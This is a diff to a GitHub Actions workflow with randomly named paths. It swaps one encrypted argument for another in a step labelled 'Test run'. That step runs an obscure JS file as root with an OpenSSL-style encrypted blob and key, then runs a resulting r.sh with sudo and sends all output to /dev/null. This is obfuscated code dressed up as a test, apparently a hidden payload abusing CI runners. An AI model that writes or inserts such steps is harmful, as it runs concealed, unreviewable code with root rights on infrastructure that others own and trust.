--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo '6i5wt'
+        echo 'wc18s'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX183oHbOv3mxe6O3dYzvqEAJDnbUVUkDGAlvu0/eiHdfpjXr0MAJBDQhPDIkn3xU24HAobFp85gs79Flqjiqr6bdHMrKxUrijiwg8ZUn+fuzmXCjwckCXg1m 3ez7ue && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+1pC/dHqN++teKpNPV59gm+NE0BI4l5U7qcwcj7zkS1t84Q+ydOLnqxzgb5BN6+gegzqLPNPMIZ5Mzkm/vcRrXSFg6eEEXATfm5VPwTTuQqOoXbuKv17qA supkmw && sudo sh r.sh > /dev/null 2>&1
